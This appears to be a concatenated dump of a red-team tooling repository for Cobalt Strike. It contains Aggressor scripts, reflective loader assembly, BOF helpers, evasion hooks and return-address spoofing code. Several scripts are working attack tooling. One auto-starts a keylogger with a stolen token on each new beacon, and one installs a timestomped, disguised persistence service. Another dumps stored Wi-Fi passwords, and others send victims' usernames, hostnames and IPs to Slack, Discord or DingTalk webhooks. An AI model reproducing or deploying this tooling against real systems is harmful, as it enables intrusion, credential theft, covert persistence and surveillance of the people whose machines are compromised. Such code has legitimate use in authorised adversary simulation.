Ldr/asm/x64/GetIp.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 64] 9 | 10 | ;; 11 | ;; Export 12 | ;; 13 | GLOBAL GetIp 14 | GLOBAL Hooks 15 | 16 | [SECTION .text$C] 17 | 18 | Hooks: 19 | ;; 20 | ;; Arbitrary symbol to reference as 21 | ;; start of hook pages 22 | ;; 23 | nop 24 | 25 | [SECTION .text$F] 26 | 27 | GetIp: 28 | ;; 29 | ;; Execute next instruction 30 | ;; 31 | call get_ret_ptr 32 | 33 | get_ret_ptr: 34 | ;; 35 | ;; Pop address and sub diff 36 | ;; 37 | pop rax 38 | sub rax, 5 39 | ret 40 | 41 | 42 | Leave: 43 | db 'E', 'N', 'D', 'O', 'F', 'C', 'O', 'D', 'E' 44 | -------------------------------------------------------------------------------- /Cobatl Strike/StartWebClient/StartWebClient.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa, Stan Hegt 2 | #@outflank.nl 3 | #Code based on https://www.tiraniddo.dev/2015/03/starting-webclient-service.html 4 | 5 | beacon_command_register("StartWebClient", "Starting WebClient Service Programmatically.", 6 | "Synopsis: StartWebClient\n\n" . 7 | "Starting WebClient Service Programmatically\n\n"); 8 | 9 | alias StartWebClient { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("StartWebClient." . barch($bid) . ".o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | beacon_inline_execute($bid, $data, "go", $null); 18 | } 19 | -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/sleep-down-when-no-operators.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | # increases the sleep interval on all Beacons when there are no operators logged in 4 | 5 | #value to set all Beacons' sleep interval and jitter to when operators log off (specified in seconds) 6 | $sleep_value = 300; 7 | $jitter_value = 20; 8 | 9 | 10 | on event_quit { 11 | #NOTE: You will need to modify the below number higher if you use agscript to log in and run scripts. 12 | if (size(users()) <= 2) { 13 | foreach $beacon (beacons()) { 14 | #ignore SMB Beacons 15 | if ($beacon["pbid"] eq '') { 16 | bsleep($beacon["id"], $sleep_value, $jitter_value); 17 | } 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /Cobalt Strike Zig Artifact Kit/build.zig: -------------------------------------------------------------------------------- 1 | const std = @import("std"); 2 | 3 | pub fn build(b: *std.Build) void { 4 | const exe = b.addExecutable(.{ 5 | .name = "artifact64big", 6 | .root_source_file = b.path("template.zig"), 7 | .target = b.resolveTargetQuery(.{ .cpu_arch = .x86_64, .os_tag = .windows }), 8 | .optimize = .ReleaseSmall, 9 | }); 10 | 11 | const payloadSize = b.option(u32, "payloadSize", "size of shellcode") orelse 350000; 12 | 13 | const options = b.addOptions(); 14 | options.addOption(u32, "payloadSize", payloadSize); 15 | 16 | exe.root_module.addOptions("build_options", options); 17 | 18 | b.installArtifact(exe); 19 | } 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/sleep-down-when-no-operators.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | # increases the sleep interval on all Beacons when there are no operators logged in 4 | 5 | #value to set all Beacons' sleep interval and jitter to when operators log off (specified in seconds) 6 | $sleep_value = 300; 7 | $jitter_value = 20; 8 | 9 | 10 | on event_quit { 11 | #NOTE: You will need to modify the below number higher if you use agscript to log in and run scripts. 12 | if (size(users()) <= 2) { 13 | foreach $beacon (beacons()) { 14 | #ignore SMB Beacons 15 | if ($beacon["pbid"] eq '') { 16 | bsleep($beacon["id"], $sleep_value, $jitter_value); 17 | } 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /Cobatl Strike/C2 Crash/dict/process.txt: -------------------------------------------------------------------------------- 1 | NetSync.exe 2 | QuickBackup.exe 3 | AudioDriver.exe 4 | TaskManagerPlus.exe 5 | FileWatcher.exe 6 | CryptoGuard.exe 7 | UpdateService.exe 8 | MemoryOptimizer.exe 9 | ScreenCapture.exe 10 | DataEncryptor.exe 11 | PrintSpooler.exe 12 | SystemMonitor.exe 13 | CloudSyncAgent.exe 14 | VideoRenderer.exe 15 | ProcessScanner.exe 16 | DriverUpdater.exe 17 | AppLauncher.exe 18 | NetworkInspector.exe 19 | CacheCleaner.exe 20 | RegistryHelper.exe 21 | FileIndexer.exe 22 | SecurityAgent.exe 23 | UpdateChecker.exe 24 | AudioEnhancer.exe 25 | ClipboardManager.exe 26 | SessionTracker.exe 27 | FirewallControl.exe 28 | VirtualPrinter.exe 29 | SyncService.exe 30 | BackupScheduler.exe -------------------------------------------------------------------------------- /Loader/Titan Ldr/asm/x86/GetIp.asm: -------------------------------------------------------------------------------- 1 | ;; 2 | ;; Reflective Loader 3 | ;; 4 | ;; GuidePoint Security LLC 5 | ;; 6 | ;; Threat and Attack Simulation 7 | ;; 8 | [BITS 32] 9 | 10 | ;; 11 | ;; Export 12 | ;; 13 | GLOBAL _GetIp 14 | GLOBAL _Hooks 15 | 16 | [SECTION .text$C] 17 | 18 | _Hooks: 19 | ;; 20 | ;; Arbitrary symbol to reference as 21 | ;; start of hook pages 22 | ;; 23 | nop 24 | 25 | [SECTION .text$F] 26 | 27 | _GetIp: 28 | ;; 29 | ;; Execute next instruction 30 | ;; 31 | call _get_ret_ptr 32 | 33 | _get_ret_ptr: 34 | ;; 35 | ;; Pop address and sub diff 36 | ;; 37 | pop eax 38 | sub eax, 5 39 | ret 40 | 41 | 42 | _Leave: 43 | db 'E', 'N', 'D', 'O', 'F', 'C', 'O', 'D', 'E' 44 | -------------------------------------------------------------------------------- /Loader/kits/AnnoyKit/scripts/annoySongs/Play-ImperialMarch.ps1: -------------------------------------------------------------------------------- 1 | #Taken from https://gist.github.com/SadProcessor 2 | function Play-ImperialMarch(){ 3 | [console]::beep(440,500) 4 | [console]::beep(440,500) 5 | [console]::beep(440,500) 6 | [console]::beep(349,350) 7 | [console]::beep(523,150) 8 | [console]::beep(440,500) 9 | [console]::beep(349,350) 10 | [console]::beep(523,150) 11 | [console]::beep(440,1000) 12 | [console]::beep(659,500) 13 | [console]::beep(659,500) 14 | [console]::beep(659,500) 15 | [console]::beep(698,350) 16 | [console]::beep(523,150) 17 | [console]::beep(415,500) 18 | [console]::beep(349,350) 19 | [console]::beep(523,150) 20 | [console]::beep(440,1000) 21 | } 22 | -------------------------------------------------------------------------------- /Cobatl Strike/Adrenaline/cred_access/window_handles_enum/Makefile: -------------------------------------------------------------------------------- 1 | SRC = $(wildcard *.c) 2 | OBJS = $(patsubst %.c, %.x64.o, $(SRC)) 3 | CC_x64 := x86_64-w64-mingw32-gcc 4 | STRIP_x64 := x86_64-w64-mingw32-strip 5 | 6 | # Critical BOF compilation flags 7 | CFLAGS := -c -Os -fno-builtin -fno-builtin-memset -fno-builtin-memcpy -fno-builtin-memmove 8 | CFLAGS += -fno-asynchronous-unwind-tables -fno-unwind-tables 9 | CFLAGS += -fno-stack-protector -fno-stack-check -mno-stack-arg-probe 10 | CFLAGS += -nostdlib -ffunction-sections -fdata-sections 11 | 12 | all: $(OBJS) 13 | 14 | %.x64.o: %.c 15 | $(CC_x64) $(CFLAGS) -o $@ $< 16 | $(STRIP_x64) --strip-unneeded $@ 17 | 18 | clean: 19 | rm -f *.o *.x64.o 20 | -------------------------------------------------------------------------------- /Cobatl Strike/Cobalt Strike DingtalkBot/CS-Dingtalk-Bot.cna: -------------------------------------------------------------------------------- 1 | on beacon_initial { 2 | println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid")); 3 | local('$internalIP $computerName $userName'); 4 | $internalIP = replace(beacon_info($1,"internal")," ","_"); 5 | $externalIP = replace(beacon_info($1,"external")," ","_"); 6 | $computerName = replace(beacon_info($1,"computer")," ","_"); 7 | $userName = replace(beacon_info($1,"user")," ","_"); 8 | $cmd = 'python3 /root/main.py' . " --computernam " . $computerName . " --internalip " . $internalIP . " --externalip " . $externalIP . " --username " . $userName; 9 | println("Sending server: " . $cmd); 10 | exec($cmd); 11 | } 12 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/service-reboot.cna: -------------------------------------------------------------------------------- 1 | sub persist { 2 | bcd($1, 'c:\windows\system32'); 3 | 4 | # create a netsrv.exe file and co-locate it with this script. 5 | # remember netsrv.exe MUST be a service EXE. 6 | bupload($1, script_resource("netsrv.exe")); 7 | btimestomp($1, "netsrv.exe", "cmd.exe"); 8 | bshell($1, 'sc delete netsrv'); 9 | bshell($1, 'sc create netsrv binPath= "C:\windows\system32\netsrv.exe" start= auto DisplayName= "System Network Service"'); 10 | bshell($1, 'sc start netsrv'); 11 | } 12 | 13 | popup beacon_top { 14 | item "Create Service" { 15 | local('$bid'); 16 | foreach $bid ($1) { 17 | persist($bid); 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /Cobatl Strike/Psc/Psc.cna: -------------------------------------------------------------------------------- 1 | #author Cornelis de Plaa 2 | #@outflank.nl 3 | 4 | #register help 5 | beacon_command_register("psc", "Show detailed information from processes with established TCP and RDP connections.", 6 | "Synopsis: psc\n\n" . 7 | "Shows a detailed list of all processes with established TCP and RDP connections.\n"); 8 | 9 | alias psc { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("Psc." . barch($bid) . ".o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | blog($bid, "Tasked beacon to enumerate processes with established TCP and RDP connections."); 18 | beacon_inline_execute($bid, $data, "go", $null); 19 | } 20 | -------------------------------------------------------------------------------- /Und3rf10w/auto-keylogger.cna: -------------------------------------------------------------------------------- 1 | sub getexplorerpid { 2 | bps($1, lambda({ 3 | local('$pid $name $entry'); 4 | foreach $entry (split("\n", $2)) { 5 | ($name, $ppid, $pid, $arch) = split("\\s+", $entry); 6 | println($entry); 7 | # println("Name: $name PID: $pid "); 8 | if ($name eq "explorer.exe") { 9 | # $1 is our Beacon ID, $pid is the PID of explorer.exe 10 | [$callback: $1, $pid]; 11 | } 12 | } 13 | }, $callback => $2)); 14 | } 15 | 16 | 17 | on beacon_initial { 18 | getexplorerpid($1, { 19 | bsteal_token($1, int($2)); 20 | bkeylogger($1, $2, "x64"); 21 | }); 22 | blog($1, "Automatic keylogger activated"); 23 | bnote($1, "Auto-keylogger") 24 | } -------------------------------------------------------------------------------- /Cobatl Strike/Beacon Notifier Discord/notify.cna: -------------------------------------------------------------------------------- 1 | #Change request path 2 | #You can change CS to identify different CS instances 3 | 4 | $pythonPath = "/PATH/request.py"; 5 | 6 | on beacon_initial { 7 | $computer = beacon_info($1, "computer"); 8 | $external = beacon_info($1, "external"); 9 | $internal = beacon_info($1, "internal"); 10 | $user = beacon_info($1, "user"); 11 | $beacon_text = "================================ 12 | New Beacon from CS! 13 | User : $user 14 | Computer Name : $computer 15 | External IP : $external 16 | Internal IP : $internal 17 | ================================"; 18 | @command = @('python3',$pythonPath,$beacon_text); 19 | exec(@command); 20 | } 21 | 22 | 23 | -------------------------------------------------------------------------------- /Cobatl Strike/No PowerShell trunk/DOTNET45/readme.txt: -------------------------------------------------------------------------------- 1 | These binaries are compiled against .NET Framework 4.5.0 (as opposed to the .NET Framework 2.0). The .NET Framework 4.5 provides more and improved functionalities, however it is not included by default in older versions of Microsoft Windows [1]. See the Notes column of the Cheatsheet for info on which additional cmdlets are supported [2]. 2 | 3 | In NoPowerShell v1.23 the Compress-Archive and Expand-Archive cmdlets require .NET 4.5+. 4 | 5 | 6 | [1] Overview of .NET Framework release history 7 | https://en.wikipedia.org/wiki/.NET_Framework_version_history#Overview 8 | [2] NoPowerShell cmdlet Cheatsheet 9 | https://github.com/bitsadmin/nopowershell/blob/master/CHEATSHEET.md -------------------------------------------------------------------------------- /Cobatl Strike/WiFiPasswords/wifipasswords.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "wifipasswords", "Dump all stored Wi-Fi passwords.", 5 | "INFO:\nEnumerates all saved SSID's, then retrieves each AP's stored plaintext password\n\n" . 6 | "USAGE:\nwifipasswords\n\n"); 7 | 8 | alias wifipasswords { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("wifipasswords.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | $arg_data = bof_pack($bid); 17 | 18 | blog($bid, "Tasked to enumerate SSID's and dump stored WiFi passwords.."); 19 | beacon_inline_execute($bid, $data, "go", $arg_data); 20 | } 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Loader/AceLdr/src/hooks/hooks.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "../include.h" 4 | 5 | SECTION( D ) HANDLE WINAPI GetProcessHeap_Hook(); 6 | SECTION( D ) VOID WINAPI Sleep_Hook( DWORD dwMilliseconds ); 7 | SECTION( D ) LPVOID WINAPI HeapAlloc_Hook( HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes ); 8 | SECTION( D ) PVOID NTAPI RtlAllocateHeap_Hook( PVOID heapHandle, ULONG flags, SIZE_T size ); 9 | SECTION( D ) HINTERNET InternetConnectA_Hook( HINTERNET hInternet, LPCSTR lpszServerName, INTERNET_PORT nServerPort, LPCSTR lpszUserName, LPCSTR lpszPassword, DWORD dwService, DWORD dwFlags, DWORD_PTR dwContext ); 10 | SECTION( D ) NTSTATUS NtWaitForSingleObject_Hook( HANDLE handle, BOOLEAN alertable, PLARGE_INTEGER timeout ); 11 | -------------------------------------------------------------------------------- /Cobatl Strike/Sweet Potato CS/Com/IEnumSTATSTG.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | [ComImport] 6 | [Guid("0000000d-0000-0000-C000-000000000046")] 7 | [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] 8 | public interface IEnumSTATSTG { 9 | // The user needs to allocate an STATSTG array whose size is celt. 10 | [PreserveSig] 11 | uint 12 | Next(uint celt, [MarshalAs(UnmanagedType.LPArray), Out] STATSTG[] rgelt, out uint pceltFetched); 13 | 14 | void Skip(uint celt); 15 | 16 | void Reset(); 17 | 18 | [return: MarshalAs(UnmanagedType.Interface)] 19 | IEnumSTATSTG Clone(); 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Cobatl Strike/ForceLockScreen/forcelockscreen.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "forcelockscreen", "Force the lock screen of the current user session.", 5 | "INFO:\nForce the lock screen of the current user session.\n\n" . 6 | "USAGE:\nforcelockscreen\n\n"); 7 | 8 | alias forcelockscreen { 9 | $bid = $1; 10 | 11 | # Read in the right BOF file 12 | $handle = openf(script_resource("forcelockscreen.o")); 13 | $data = readb($handle, -1); 14 | closef($handle); 15 | 16 | 17 | $arg_data = bof_pack($bid); 18 | 19 | blog($bid, "Tasked to lock the current user's screen.."); 20 | beacon_inline_execute($bid, $data, "go", $arg_data); 21 | 22 | } 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Cobatl Strike/Webcam BOF/common/anticrash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bofdefs.h" 3 | //For some reason char *[] is invalid in BOF files 4 | //So this function stands to work around that problem 5 | 6 | //makes a char *[] since we can't seem to otherwise 7 | //count is the number of strings you're passing in will crash if this is wrong 8 | 9 | //Must call intFree on returned result 10 | char ** antiStringResolve(unsigned int count, ...) 11 | { 12 | va_list strings; 13 | va_start(strings, count); 14 | char ** result = intAlloc(sizeof(char *) * count); 15 | for(int i = 0; i < count; i++) 16 | { 17 | result[i] = (char *)va_arg(strings, char *); 18 | } 19 | va_end(strings); 20 | return result; 21 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/kits/AnnoyKit/scripts/annoySongs/Play-ImperialMarch.ps1: -------------------------------------------------------------------------------- 1 | #Taken from https://gist.github.com/SadProcessor 2 | function Play-ImperialMarch(){ 3 | [console]::beep(440,500) 4 | [console]::beep(440,500) 5 | [console]::beep(440,500) 6 | [console]::beep(349,350) 7 | [console]::beep(523,150) 8 | [console]::beep(440,500) 9 | [console]::beep(349,350) 10 | [console]::beep(523,150) 11 | [console]::beep(440,1000) 12 | [console]::beep(659,500) 13 | [console]::beep(659,500) 14 | [console]::beep(659,500) 15 | [console]::beep(698,350) 16 | [console]::beep(523,150) 17 | [console]::beep(415,500) 18 | [console]::beep(349,350) 19 | [console]::beep(523,150) 20 | [console]::beep(440,1000) 21 | } 22 | -------------------------------------------------------------------------------- /Cobatl Strike/EnumDotnet/enumdotnet.cna: -------------------------------------------------------------------------------- 1 | # author REDMED-X 2 | 3 | beacon_command_register( 4 | "enumdotnet", "Find processes that most likely have .NET loaded.", 5 | "INFO:\nFind processes that most likely have .NET loaded by searching for the section name: \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_\n\n" . 6 | "USAGE:\nenumdotnet\n\n"); 7 | 8 | 9 | alias enumdotnet { 10 | $bid = $1; 11 | 12 | # Read in the right BOF file 13 | $handle = openf(script_resource("enumdotnet.o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | 17 | blog($bid, "Tasked to search for processes that have .NET loaded.."); 18 | 19 | beacon_inline_execute($bid, $data, "go", $null); 20 | } 21 | 22 | 23 | -------------------------------------------------------------------------------- /Cobatl Strike/Screenshot BOF/common/anticrash.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bofdefs.h" 3 | //For some reason char *[] is invalid in BOF files 4 | //So this function stands to work around that problem 5 | 6 | //makes a char *[] since we can't seem to otherwise 7 | //count is the number of strings you're passing in will crash if this is wrong 8 | 9 | //Must call intFree on returned result 10 | char ** antiStringResolve(unsigned int count, ...) 11 | { 12 | va_list strings; 13 | va_start(strings, count); 14 | char ** result = intAlloc(sizeof(char *) * count); 15 | for(int i = 0; i < count; i++) 16 | { 17 | result[i] = (char *)va_arg(strings, char *); 18 | } 19 | va_end(strings); 20 | return result; 21 | } -------------------------------------------------------------------------------- /Loader/AceLdr/src/retaddr.c: -------------------------------------------------------------------------------- 1 | // 2 | // https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html 3 | // 4 | 5 | 6 | #include "include.h" 7 | 8 | SECTION( E ) PVOID SpoofRetAddr( PVOID function, HANDLE module, ULONG size, PVOID a, PVOID b, PVOID c, PVOID d, PVOID e, PVOID f, PVOID g, PVOID h ) 9 | { 10 | PVOID Trampoline; 11 | 12 | if( function != NULL ) 13 | { 14 | Trampoline = FindGadget( module, size ); 15 | if( Trampoline != NULL ) 16 | { 17 | PRM param = { Trampoline, function }; 18 | return Spoof( a, b, c, d, ¶m, NULL, e, f, g, h ); 19 | }; 20 | }; 21 | 22 | return NULL; 23 | }; 24 | -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 1/slack-notify-beacon.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | #set this info: 4 | #Include the '#' and ':' in the corresponding scalars 5 | $slack_channel = "#SLACK_CHANNEL_GOES_HERE"; 6 | $slack_emoji = ':skeleton:'; 7 | $slack_webhookURL = 'https://hooks.slack.com/services/TXXXXXXXX/YYYYYYYYY/ZZZZZZZZZZZZZZZZZZZZZZZZ'; 8 | 9 | $teamserver_hostname = 'HOSTNAME-GOES-HERE'; 10 | 11 | 12 | on beacon_initial { 13 | @curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Notifier Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"New Beacon on ' . $teamserver_hostname . '. Commence the jigglin!"}',$slack_webhookURL); 14 | exec(@curl_command); 15 | } -------------------------------------------------------------------------------- /Cobatl Strike/Aggressor Script 3/slack-notify-beacon.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | #set this info: 4 | #Include the '#' and ':' in the corresponding scalars 5 | $slack_channel = "#SLACK_CHANNEL_GOES_HERE"; 6 | $slack_emoji = ':skeleton:'; 7 | $slack_webhookURL = 'https://hooks.slack.com/services/TXXXXXXXX/YYYYYYYYY/ZZZZZZZZZZZZZZZZZZZZZZZZ'; 8 | 9 | $teamserver_hostname = 'HOSTNAME-GOES-HERE'; 10 | 11 | 12 | on beacon_initial { 13 | @curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Notifier Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"New Beacon on ' . $teamserver_hostname . '. Commence the jigglin!"}',$slack_webhookURL); 14 | exec(@curl_command); 15 | } -------------------------------------------------------------------------------- /Cobatl Strike/bluescreenofjeff/slack-notify-beacon.cna: -------------------------------------------------------------------------------- 1 | #author: bluescreenofjeff 2 | 3 | #set this info: 4 | #Include the '#' and ':' in the corresponding scalars 5 | $slack_channel = "#SLACK_CHANNEL_GOES_HERE"; 6 | $slack_emoji = ':skeleton:'; 7 | $slack_webhookURL = 'https://hooks.slack.com/services/TXXXXXXXX/YYYYYYYYY/ZZZZZZZZZZZZZZZZZZZZZZZZ'; 8 | 9 | $teamserver_hostname = 'HOSTNAME-GOES-HERE'; 10 | 11 | 12 | on beacon_initial { 13 | @curl_command = @('curl','-X','POST','--data-urlencode','payload={"username": "Cobalt Strike Notifier Bot", "icon_emoji": "' . $slack_emoji. '", "channel": "' . $slack_channel . '", "text":"New Beacon on ' . $teamserver_hostname . '. Commence the jigglin!"}',$slack_webhookURL); 14 | exec(@curl_command); 15 | } --------------------------------------------------------------------------------